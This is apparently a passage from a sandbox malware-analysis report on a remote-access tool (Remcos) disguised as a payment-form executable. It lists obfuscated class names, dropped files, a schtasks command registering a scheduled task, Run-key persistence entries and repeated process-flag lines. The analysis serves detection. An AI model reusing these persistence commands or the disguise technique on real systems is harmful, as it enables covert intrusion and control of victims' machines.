              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, FrpWtYigKb7lvufHNE.csHigh entropy of concatenated method names: 'Dispose', 'YtVpgIxw1h', 'kkp507IbCL', 'rvIwiJ6Hqw', 'FJEpRNITpX', 'nLTpzaktdc', 'ProcessDialogKey', 'sq15loUWI7', 'Oeo5p4gsMW', 'STC55X2Zkd'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, G8mARHMuZR8FXfnmCS.csHigh entropy of concatenated method names: 'UhjH7mra5i', 'XY6HjYPDkV', 'PF6HMPTPVB', 'PnIHUKZk3P', 'YjHH0melV6', 'WrkHKCle1o', 'sOSHSxE2Ay', 'mn8HPByR6u', 'mnIHwZgHT8', 'BaqHEZJEmm'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, QwhKlmmQbOGs1vhvh6.csHigh entropy of concatenated method names: 'CfliMWOhKg', 'w9UiUDG2tH', 'Ft2icQSo52', 'R2EiBvSMaI', 'JTLiDX0BLW', 'zu2iFCw2ph', 'cERiqd1hWw', 'UeLidOBibZ', 'IrdigGqCk0', 'kaciRRuIsY'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, T5nHuxt62bFgjEPISG.csHigh entropy of concatenated method names: 'IjXpNwhKlm', 'sbOpZGs1vh', 'Vbbp3WaNw9', 'dYxpI3UyMs', 'YYdpH3XJCT', 'hVupuxxaXb', 'WDhyjeDnKZqFw5Nxgb', 'UTyMZYiwrtO9F1etxh', 'VFJppwL6hq', 'JrcpA7tFVX'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, ytAJUOq4HRtVIxw1hb.csHigh entropy of concatenated method names: 'mHpCHhDhiK', 'eGAC9eOC0p', 'jXGCCsOrUl', 'SCLCL5Wpq2', 'GgZCnqdJY7', 'PV9ChNAlZb', 'Dispose', 'xEfsY6GYYd', 'LYYsiI6dlC', 'BYBsxtChcR'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.csHigh entropy of concatenated method names: 'QIpAWe27sg', 'FuPAYYEfId', 'kNuAi7ECAD', 'LkaAx9juvZ', 'fadAONuKQG', 'jIgA28xoeJ', 'B0qANBD0D2', 'erZAZEhILB', 'oEjAv56Sng', 'QV5A3btiPj'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, FLqfnnFPJGKibtN3dh.csHigh entropy of concatenated method names: 'Y4E9d0dE85', 'VTA9R2KG8I', 'F0Bsl0GkEh', 'zfnspfJt4p', 'JK99e7nLcY', 'VVo9jcK7ca', 'vJl9XsMxPy', 'WAR9MA0Ipw', 'AG69UpADh6', 'BAl9cfyrKE'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, SyMs7Qb8mMgfKRYd3X.csHigh entropy of concatenated method names: 'iKjO69oqYs', 'AoxO1jWUWy', 'gQIxKUeM4B', 'CBFxSoAbnr', 'Vy1xPJ9uO0', 'PvpxwSGM8A', 'oADxET4bue', 'tHBxoSXc4W', 'O04xfCamDu', 'Xnax7yCGZW'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, Q2ZkdhRylKQKsTs4XL.csHigh entropy of concatenated method names: 'yfxQxmyW92', 'idvQO32g4N', 'YW9Q2EEqqh', 'jfVQNkPo1b', 'OWcQCDmMOZ', 'K23QZvnAu5', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, Gj5cxnppjd4ARLaEyxk.csHigh entropy of concatenated method names: 'LDuQRsSvVy', 'oogQzMmo48', 'OtuLlfO3iy', 'TPwLpbxbK9', 'PI9L5iiFdZ', 'iayLA22uod', 'ELfLthwy4n', 'YaTLWHbihm', 'PKbLYuxLOW', 'H2OLiZI623'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, sL1PZb5DGwDeE7Paan.csHigh entropy of concatenated method names: 'AWgTY7PLH', 'g8Kaupa9I', 'Ftn87PLKd', 'P9L1tKRBn', 'vXt4g5tI0', 'gy9b6gOwH', 'bM7NAbVyCE1i2xhafS', 'TsIBUoHnMYi64TXIUB', 'VNxskRIHc', 'XpuQw4aMX'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, bjins3pl3hlyMvyiu1I.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aEIQepphlQ', 'mU9Qj58lhs', 'y0NQXRapWc', 'KWiQMOTVDf', 'onLQUsal56', 'bjSQclOrDb', 'I1mQBG5w5x'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, xCTOVurxxaXbvrBFwx.csHigh entropy of concatenated method names: 'vWd2W855I1', 'Wtr2iwe7yR', 'L4k2OKo9UO', 'zDx2NX7akf', 'wKN2ZZGGjH', 'Tc6ODvXyBP', 'IxtOFbROTd', 'zXuOq33Z0J', 'D3HOdSWvLP', 'rvMOglfgR9'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, DoUWI7geeo4gsMWcTC.csHigh entropy of concatenated method names: 'siDCriUjgS', 'P8lC0SpHjg', 'V26CKfLBW6', 'eZtCSUnIK3', 'QnpCPvbNJ0', 'RnnCwjWTK4', 'rswCEIcFAU', 'CeZCoHDfxA', 'A8bCf0odHA', 'i2aC72Mua5'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, xWxrRF4bbWaNw9tYx3.csHigh entropy of concatenated method names: 'HI8xabX1ct', 'kqsx8RyJ90', 'k5vxm6bWpF', 'GENx4DXHHV', 'nSmxHs7djY', 'qGuxuTgOBu', 'P1Xx9qYqsw', 'bfNxshgmBc', 'vIqxCjlZi4', 'PKixQCAWNR'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, u0rhBJzJNPIkt5N8Be.csHigh entropy of concatenated method names: 'bhQQ8mDI5j', 'mDXQmiOJTZ', 'FykQ4ZLMc9', 'GpGQr6kNDA', 'lVlQ05eThQ', 'hOsQSW2MoQ', 'tjuQPremiu', 'SH7QhBykvY', 'v0pQJC1boc', 'hqBQyrL5Yg'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, k92S0QfWqHPDXLhQIB.csHigh entropy of concatenated method names: 'VwrNJZ6G28', 'u7XNyFGXF2', 'CloNT2tfyQ', 'Yv7NaW5Z1u', 'J4FN6eXIDO', 'iZPN8qy1qo', 'KliN1072L4', 'iDyNmcr39k', 'mJUN4NhVk8', 'xB0NbeIVh9'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, E9y7JUBhAG4VZB3dwW.csHigh entropy of concatenated method names: 'Bkh93isiBC', 'K7v9IoVLwH', 'ToString', 'Bqn9YwYoGF', 'ypR9i4n1EN', 'k7P9xJHMQh', 'Q2D9OfBov0', 'gOl92fuDC7', 'X6v9NTI1af', 'wYo9ZYosOt'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, lVPoTvXllLOLRpP1BJ.csHigh entropy of concatenated method names: 'ur8VmQT5b6', 'xDMV4jQbBw', 'ISRVrfb1Ee', 'RXgV0pnskO', 'IgfVSierG5', 'EyJVPcKybC', 'OSZVE3TGQE', 'h4cVoZBpc0', 'pJEV7Dsa7A', 'XRlVesdraM'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, l1OxmNEibSWnLqsK2U.csHigh entropy of concatenated method names: 'W92NYxpbaN', 'mi3NxqIRvs', 'j7UN2buWJe', 'Xc02RaN2jW', 'yv52zGpfA0', 'PgQNlfnKJW', 'YDcNpLDSr0', 'akAN5jJ4qy', 'sagNA3aAM4', 'eOHNtJvDkb'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, vEj6LbpAJ87hLqXMKwF.csHigh entropy of concatenated method names: 'tg6LRpQrDw', 'fc8Lznk3Xi', 'JaDklfHF73', 'BBHtsqdvXsCQ54Nonku', 'UhFyVOdnpJ4W0UGlmxa', 'NkHtCvdzTMPkXm4X1jE'
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, FrpWtYigKb7lvufHNE.csHigh entropy of concatenated method names: 'Dispose', 'YtVpgIxw1h', 'kkp507IbCL', 'rvIwiJ6Hqw', 'FJEpRNITpX', 'nLTpzaktdc', 'ProcessDialogKey', 'sq15loUWI7', 'Oeo5p4gsMW', 'STC55X2Zkd'
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004063C6 ShellExecuteW,URLDownloadToFileW,9_2_004063C6
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeFile created: C:\ProgramData\AppUpdate\remcos.exeJump to dropped file
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeFile created: C:\Users\user\AppData\Roaming\iKgKaogJ.exeJump to dropped file
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeFile created: C:\ProgramData\AppUpdate\remcos.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_00418A00
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppUpdateJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppUpdateJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run AppUpdateJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run AppUpdateJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041A8DA
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
